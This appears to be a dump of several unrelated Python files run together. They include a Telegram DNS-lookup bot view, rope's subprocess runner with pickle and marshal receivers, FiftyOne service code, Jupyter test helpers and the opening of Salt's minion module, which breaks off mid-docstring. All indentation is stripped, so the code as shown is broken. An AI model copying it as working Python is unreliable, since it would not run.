from django.conf import settings
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import dns.resolver
import json
import requests
import threading
# Create your views here.
def send_message(chat_id, text):
url = 'https://api.telegram.org/bot{}/{}'.format(settings.TELEGRAM_BOT_TOKEN['domain'], 'sendMessage')
print('url: {}'.format(url))
data = {}
data['chat_id'] = chat_id
data['text'] = text
r = requests.post(url, data=data)
def resolve_and_response(chat_id, domain_name):
# Get IP of domain
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = ['8.8.8.8']
answer = resolver.query(domain_name, 'A')
domain_ip_list = []
for rr in answer:
domain_ip_list.append(rr.to_text())
res = 'Domain: {}\n'.format(domain_name)
domain_ips = '\n'.join(map(str, domain_ip_list))
res += domain_ips
# Send message back
send_message(chat_id, res)
@csrf_exempt
def index(request):
print('{}'.format(request))
print('{}'.format(request.body))
body = json.loads(request.body)
print('body: {}'.format(body))
print('')
print('')
print('')
print('dumps: {}'.format(json.dumps(body)))
# Get chat ID
chat_id = body['message']['chat']['id']
# Get text content
text = body['message']['text']
# Trim
text = text.strip()
print('cid: {}, text: {}'.format(chat_id, text))
# Command not support
if text[0:3] != '/d ':
print('Command not supported')
message = '尼在說啥我聽不懂=3=......'
t = threading.Thread(target = send_message, args=(chat_id, message))
t.start()
return HttpResponse('OK')
# Get domain name
domain_name = text[3:]
# Get IP of domain
t = threading.Thread(target = resolve_and_response, args=(chat_id, domain_name,))
t.start()
return HttpResponse('OK')
|
doa.py
|
import base64
import hashlib
import hmac
try:
import cPickle as pickle
except ImportError:
import pickle
import marshal
import os
import socket
import subprocess
import sys
import tempfile
import threading
def _compat_compare_digest(a, b):
"""Implementation of hmac.compare_digest for python < 2.7.7.
This function uses an approach designed to prevent timing analysis by
avoiding content-based short circuiting behaviour, making it appropriate
for cryptography.
"""
if len(a) != len(b):
return False
# Computes the bitwise difference of all characters in the two strings
# before returning whether or not they are equal.
difference = 0
for (a_char, b_char) in zip(a, b):
difference |= ord(a_char) ^ ord(b_char)
return difference == 0
try:
from hmac import compare_digest
except ImportError:
compare_digest = _compat_compare_digest
class PythonFileRunner(object):
"""A class for running python project files"""
def __init__(self, pycore, file_, args=None, stdin=None,
stdout=None, analyze_data=None):
self.pycore = pycore
self.file = file_
self.analyze_data = analyze_data
self.observers = []
self.args = args
self.stdin = stdin
self.stdout = stdout
def run(self):
"""Execute the process"""
env = dict(os.environ)
file_path = self.file.real_path
path_folders = self.pycore.project.get_source_folders() + \
self.pycore.project.get_python_path_folders()
env['PYTHONPATH'] = os.pathsep.join(folder.real_path
for folder in path_folders)
runmod_path = self.pycore.project.find_module('rope.base.oi.runmod').real_path
self.receiver = None
self._init_data_receiving()
send_info = '-'
if self.receiver:
send_info = self.receiver.get_send_info()
args = [sys.executable, runmod_path, send_info,
self.pycore.project.address, self.file.real_path]
if self.analyze_data is None:
del args[1:4]
if self.args is not None:
args.extend(self.args)
self.process = subprocess.Popen(
executable=sys.executable, args=args, env=env,
cwd=os.path.split(file_path)[0], stdin=self.stdin,
stdout=self.stdout, stderr=self.stdout, close_fds=os.name != 'nt')
def _init_data_receiving(self):
if self.analyze_data is None:
return
# Disabling FIFO data transfer due to blocking when running
# unittests in the GUI.
# XXX: Handle FIFO data transfer for `rope.ui.testview`
if True or os.name == 'nt':
self.receiver = _SocketReceiver()
else:
self.receiver = _FIFOReceiver()
self.receiving_thread = threading.Thread(
target=self._receive_information)
self.receiving_thread.setDaemon(True)
self.receiving_thread.start()
def _receive_information(self):
#temp = open('/dev/shm/info', 'wb')
for data in self.receiver.receive_data():
self.analyze_data(data)
#temp.write(str(data) + '\n')
#temp.close()
for observer in self.observers:
observer()
def wait_process(self):
"""Wait for the process to finish"""
self.process.wait()
if self.analyze_data:
self.receiving_thread.join()
def kill_process(self):
"""Stop the process"""
if self.process.poll() is not None:
return
try:
if hasattr(self.process, 'terminate'):
self.process.terminate()
elif os.name != 'nt':
os.kill(self.process.pid, 9)
else:
import ctypes
handle = int(self.process._handle)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
except OSError:
pass
def add_finishing_observer(self, observer):
"""Notify this observer when execution finishes"""
self.observers.append(observer)
class _MessageReceiver(object):
def receive_data(self):
pass
def get_send_info(self):
pass
class _SocketReceiver(_MessageReceiver):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data_port = 3037
self.key = os.urandom(32)
while self.data_port < 4000:
try:
self.server_socket.bind(('localhost', self.data_port))
break
except socket.error:
self.data_port += 1
self.server_socket.listen(1)
def get_send_info(self):
return '%d:%s' % (self.data_port,
base64.b64encode(self.key).decode('utf-8'))
def receive_data(self):
conn, addr = self.server_socket.accept()
self.server_socket.close()
my_file = conn.makefile('rb')
while True:
# Received messages must meet the following criteria:
# 1. Must be contained on a single line.
# 2. Must be prefixed with a base64 encoded sha256 message digest
# of the base64 encoded pickle data.
# 3. Message digest must be computed using the correct key.
#
# Any messages received that do not meet these criteria will never
# be unpickled and will be dropped silently.
try:
buf = my_file.readline()
if len(buf) == 0:
break
try:
digest_end = buf.index(b':')
buf_digest = base64.b64decode(buf[:digest_end])
buf_data = buf[digest_end + 1:-1]
decoded_buf_data = base64.b64decode(buf_data)
except:
# Corrupted data; the payload cannot be trusted and just has
# to be dropped. See CVE-2014-3539.
continue
digest = hmac.new(self.key, buf_data, hashlib.sha256).digest()
if not compare_digest(buf_digest, digest):
# Signature mismatch; the payload cannot be trusted and just
# has to be dropped. See CVE-2014-3539.
continue
yield pickle.loads(decoded_buf_data)
except EOFError:
break
my_file.close()
conn.close()
class _FIFOReceiver(_MessageReceiver):
def __init__(self):
# XXX: this is insecure and might cause race conditions
self.file_name = self._get_file_name()
os.mkfifo(self.file_name)
def _get_file_name(self):
prefix = tempfile.gettempdir() + '/__rope_'
i = 0
while os.path.exists(prefix + str(i).rjust(4, '0')):
i += 1
return prefix + str(i).rjust(4, '0')
def get_send_info(self):
return self.file_name
def receive_data(self):
my_file = open(self.file_name, 'rb')
while True:
try:
yield marshal.load(my_file)
except EOFError:
break
my_file.close()
os.remove(self.file_name)
|
network.py
|
import threading
import json
import time
from .socket_handler import SocketHandler
from ..codes import MSG_FIELD
socket_handler = SocketHandler()
def update_node(message, socket):
"""Update a node in the socket handler.
Args:
message (dict): The message containing the ID of the node to be updated.
socket: Socket descriptor of the node to be updated.
"""
try:
worker = socket_handler.get(socket)
worker.update_node_infos(message)
except Exception:
pass
def register_node(message, socket):
"""Register a new node to the socket handler.
Args:
message (dict): The message containing the ID of the node to be registered.
socket: Socket descriptor of the node to be registered.
Returns:
dict or None: Returns a status of success if the node is registered.
"""
try:
time.sleep(1)
node_id = message[MSG_FIELD.NODE_ID]
worker = socket_handler.new_connection(node_id, socket)
t = threading.Thread(target=worker.monitor)
t.start()
return {"status": "success!"}
except Exception:
pass
def forward(message, socket):
"""Forward message to a specific node.
Args:
message (dict): The message which contains the ID of the node to be forwarded to.
socket: Socket descriptor of the node to which the message is forwarded.
"""
try:
time.sleep(1)
dest = message[MSG_FIELD.DESTINATION]
worker = socket_handler.get(dest)
if worker:
content = message[MSG_FIELD.CONTENT]
worker.send(json.dumps(content))
except Exception:
pass
|
main.py
|
"""
This script provides a consistent environment for services to run in. The basic
architecture is:
- parent process (python, ipython, etc.)
- this process, referred to as the "current" process (service/main.py)
- child process (the service)
- (optional): any child processes that the service creates
- clients (any other Python processes that are using this service) - see below
Some services that we spin up do not terminate on their own when their parent
process terminates, so they need to be killed explicitly. However, if the
parent process is a Python interpreter that is in the process of shutting down,
it cannot reliably kill its children. This script works around these issues by
detecting when the parent process exits, terminating its children, and only
then exiting itself.
Some services can also only have a single running instance per user. Notably,
only one instance of MongoDB can use a given data folder. To support this, when
invoked with the "--multi" option, this script allows additional "clients", i.e.
other Python processes using FiftyOne, to register themselves at any time. This
script will continue running in the background and keep the child process alive
until all registered clients, including the original parent process, have
exited.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import argparse
import collections
import enum
import os
import signal
import subprocess
import sys
import threading
import traceback
import psutil
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.core.service import Service
from fiftyone.service.ipc import IPCServer
lock = threading.Lock()
# global flag set when either the parent or child has terminated, to trigger
# shutdown of the current process (and children as necessary)
exiting = threading.Event()
class ExitMode(enum.IntEnum):
CHILD = 1
PARENT = 2
# set to indicate whether the child or parent exited first
exit_mode = None
def trigger_exit(mode):
"""Start the shutdown process."""
with lock:
global exit_mode
if exit_mode is None:
exit_mode = ExitMode(mode)
exiting.set()
def start_daemon_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
return thread
class ChildStreamMonitor(object):
"""Monitor for an output stream (stdout or stderr) of a child process.
This class serves multiple purposes:
- Collects output from the child process in a rolling buffer in the
background, and makes it available in a thread-safe manner.
- Causes the current process to exit when the child process closes the
stream (i.e. when the child process exits).
"""
def __init__(self, stream):
self.stream = stream
self.output_deque = collections.deque(maxlen=4)
thread = threading.Thread(target=self._run_monitor_thread)
thread.start()
def _run_monitor_thread(self):
"""Background task to collect output from the child process.
This is primarily necessary to keep the child process from hanging,
which would occur if it produces too much output that the current
process doesn't read, but the collected output is also made available
for convenience.
"""
while True:
chunk = self.stream.read(1024)
if not chunk:
# EOF - subprocess has exited, so trigger shutdown
trigger_exit(ExitMode.CHILD)
break
self.output_deque.appendleft(chunk)
def to_bytes(self):
"""Return output recently collected from the child process.
Currently, this is limited to the most recent 4KB.
"""
return b"".join(self.output_deque)
class ClientMonitor(object):
"""Monitor to keep track of all clients using this service.
This is only used for services that use multiple clients, e.g. the database
service. In addition to tracking the original parent process, other
processes can also request to be tracked by sending a message to this
process as a tuple: ("register", PID). trigger_exit(PARENT) is only called
after the original parent and all registered clients have shut down.
"""
# sentinel used to represent the original parent (which is tracked without
# its PID)
_PARENT = "parent"
def __init__(self):
"""Creates and starts a client monitor."""
# This has an internal lock, so it is reused for any operations that
# need to be synchronized
self.cond = threading.Condition()
# A set of clients (psutil.Process objects, which are hashable).
# As long as monitor_stdin() hasn't been called yet, we can assume the
# parent is still alive, and this can be changed later
self.clients = {ClientMonitor._PARENT}
# start background tasks
self.thread = start_daemon_thread(target=self._background_loop)
self.server = IPCServer.run_in_background(
on_message=self._handle_message
)
def notify_parent_exit(self):
"""Notifies the monitor that the original parent process has exited."""
self._notify_exit(ClientMonitor._PARENT)
def _background_loop(self):
"""Main background loop - waits for all clients to exit, then shuts down
the current process."""
with self.cond:
while self.clients:
self.cond.wait()
# all clients have exited now, so shut down
trigger_exit(ExitMode.PARENT)
def _background_wait(self, process):
try:
process.wait()
except psutil.Error:
pass
finally:
self._notify_exit(process)
def _notify_exit(self, process):
"""Notifies _background_loop that a client has exited."""
with self.cond:
self.clients.remove(process)
self.cond.notify_all()
def _handle_message(self, message):
"""Handles an incoming IPC message.
This currently supports registering and unregistering clients.
Args:
message (tuple): a 2-item tuple (command: str, argument)
Returns:
response to send to the client (True on success, Exception on failure)
"""
if not isinstance(message, tuple):
raise TypeError("Expected tuple, got " + str(type(message)))
command, arg = message
with lock:
if exiting.is_set():
raise RuntimeError("service is exiting, cannot connect")
if command == "register":
process = psutil.Process(int(arg))
with self.cond:
if process not in self.clients:
self.clients.add(process)
start_daemon_thread(
target=lambda: self._background_wait(process)
)
return True
elif command == "unregister":
process = psutil.Process(int(arg))
self._notify_exit(process)
return True
else:
raise ValueError("Unrecognized command: " + repr(command))
if __name__ != "__main__":
raise RuntimeError(
"This file is for internal use only and cannot be imported"
)
parser = argparse.ArgumentParser()
parser.add_argument(
"--51-service",
dest="service_name",
metavar="SERVICE_NAME",
type=str,
required=True,
)
parser.add_argument("--multi", action="store_true")
args, command = parser.parse_known_args()
if not command:
raise ValueError("No command given")
if command[0].startswith("--"):
raise ValueError("Unhandled service argument: %s" % command[0])
if args.multi:
client_monitor = ClientMonitor()
# ignore signals sent to the parent process - parent process termination is
# handled below, and necessary for cleaning up the child process
if hasattr(os, "setpgrp"):
# UNIX-only: prevent child process from receiving SIGINT/other signals
# from the parent process
os.setpgrp()
# also explicitly ignore SIGINT for good measure (note that this MUST be done
# before spinning up the child process, as the child inherits signal handlers)
signal.signal(signal.SIGINT, signal.SIG_IGN)
popen_kwargs = {}
if sys.platform.startswith("win"):
# CREATE_NEW_PROCESS_GROUP: disable ctrl-c
# https://docs.microsoft.com/en-us/windows/win32/procthread/process-creation-flags?redirectedfrom=MSDN
popen_kwargs["creationflags"] = 0x00000200
# use psutil's wrapper around subprocess.Popen for convenience (e.g. it makes
# finding the child's children significantly easier)
child = psutil.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_kwargs,
)
child_stdout = ChildStreamMonitor(child.stdout)
child_stderr = ChildStreamMonitor(child.stderr)
def monitor_stdin():
"""Trigger shutdown when the parent process closes this process's stdin.
This will occur if the :class:`fiftyone.core.service.DatabaseService`
singleton destroyed.
This should only occur when the parent process has exited.
"""
while len(sys.stdin.read(1024)):
pass
if args.multi:
client_monitor.notify_parent_exit()
else:
trigger_exit(ExitMode.PARENT)
def shutdown():
"""Kill subprocesses and wait for them to finish.
Also dumps output if the main child process fails to exit cleanly.
"""
# "yarn dev" doesn't pass SIGTERM to its children - to be safe, kill all
# subprocesses of the child process first
try:
# children() returns parent processes first - start with children
# instead to make killing "yarn dev" more reliable
for subchild in reversed(child.children(recursive=True)):
try:
subchild.terminate()
except psutil.NoSuchProcess:
# we may have already caused it to exit by killing its parent
pass
child.terminate()
except psutil.NoSuchProcess:
# child already exited
pass
child.wait()
if exit_mode == ExitMode.CHILD and child.returncode != 0:
sys.stdout.buffer.write(child_stdout.to_bytes())
sys.stdout.flush()
sys.stderr.write(
"Subprocess %r exited with error %i:\n"
% (command, child.returncode)
)
sys.stderr.buffer.write(child_stderr.to_bytes())
sys.stderr.flush()
stdin_thread = start_daemon_thread(target=monitor_stdin)
exiting.wait()
shutdown()
|
utils.py
|
import datetime
import errno
import json
import os
import sys
import time
from binascii import hexlify
from threading import Event, Thread
from typing import List
from unittest import TestCase
from unittest.mock import patch
import jupyter_core.paths
import requests
from ipython_genutils.tempdir import TemporaryDirectory
from tornado.ioloop import IOLoop
from traitlets.config import Config
from jupyter_conda.handlers import NS
# Shim for notebook server or jupyter_server
#
# Provides:
# - ServerTestBase
# - assert_http_error
# - url_escape
# - url_path_join
try:
from notebook.tests.launchnotebook import (
assert_http_error,
NotebookTestBase as ServerTestBase,
)
from notebook.utils import url_escape, url_path_join
from notebook.notebookapp import NotebookApp as ServerApp
except ImportError:
from jupyter_server.tests.launchnotebook import assert_http_error # noqa
from jupyter_server.tests.launchserver import ServerTestBase # noqa
from jupyter_server.utils import url_escape, url_path_join # noqa
from jupyter_server.serverapp import ServerApp # noqa
TIMEOUT = 150
SLEEP = 1
class APITester(object):
"""Wrapper for REST API requests"""
url = "/"
def __init__(self, request):
self.request = request
def _req(self, verb: str, path: List[str], body=None, params=None):
if body is not None:
body = json.dumps(body)
response = self.request(
verb, url_path_join(self.url, *path), data=body, params=params
)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()["message"]
except Exception:
pass
response.raise_for_status()
return response
class JupyterCondaAPI(APITester):
"""Wrapper for nbconvert API calls."""
url = NS
def delete(self, path: List[str], body=None, params=None):
return self._req("DELETE", path, body, params)
def get(self, path: List[str], body=None, params=None):
return self._req("GET", path, body, params)
def patch(self, path: List[str], body=None, params=None):
return self._req("PATCH", path, body, params)
def post(self, path: List[str], body=None, params=None):
return self._req("POST", path, body, params)
def envs(self):
return self.get(["environments"]).json()
class ServerTest(ServerTestBase):
# Force extension enabling - Disabled by parent class otherwise
config = Config({"NotebookApp": {"nbserver_extensions": {"jupyter_conda": True}}})
@classmethod
def setup_class(cls):
# Copy paste from https://github.com/jupyter/notebook/blob/6.0.0/notebook/tests/launchnotebook.py
# Only to suppress setting PYTHONPATH with sys.path
# For notebook v6 we could overwrite get_env_patch but unfortunately it is not available for Python 3.5
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp("home")
data_dir = cls.data_dir = tmp("data")
config_dir = cls.config_dir = tmp("config")
runtime_dir = cls.runtime_dir = tmp("runtime")
cls.notebook_dir = tmp("notebooks")
cls.env_patch = patch.dict(
"os.environ",
{
"HOME": cls.home_dir,
"IPYTHONDIR": os.path.join(cls.home_dir, ".ipython"),
"JUPYTER_NO_CONFIG": "1", # needed in the future
"JUPYTER_CONFIG_DIR": cls.config_dir,
"JUPYTER_DATA_DIR": cls.data_dir,
"JUPYTER_RUNTIME_DIR": cls.runtime_dir,
},
)
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp("share", "jupyter")],
ENV_JUPYTER_PATH=[tmp("env", "share", "jupyter")],
SYSTEM_CONFIG_PATH=[tmp("etc", "jupyter")],
ENV_CONFIG_PATH=[tmp("env", "etc", "jupyter")],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ":memory:"
cls.token = hexlify(os.urandom(4)).decode("ascii")
started = Event()
def start_thread():
if "asyncio" in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = ServerApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize()
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
def setUp(self):
super(ServerTest, self).setUp()
self.conda_api = JupyterCondaAPI(self.request)
def wait_task(self, endpoint: str):
start_time = datetime.datetime.now()
if endpoint.startswith("/" + NS):
endpoint = endpoint[len(NS) + 1 :]
while (datetime.datetime.now() - start_time).total_seconds() < TIMEOUT:
time.sleep(SLEEP)
response = self.conda_api.get([endpoint])
response.raise_for_status()
if response.status_code != 202:
return response
raise RuntimeError("Request {} timed out.".format(endpoint))
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
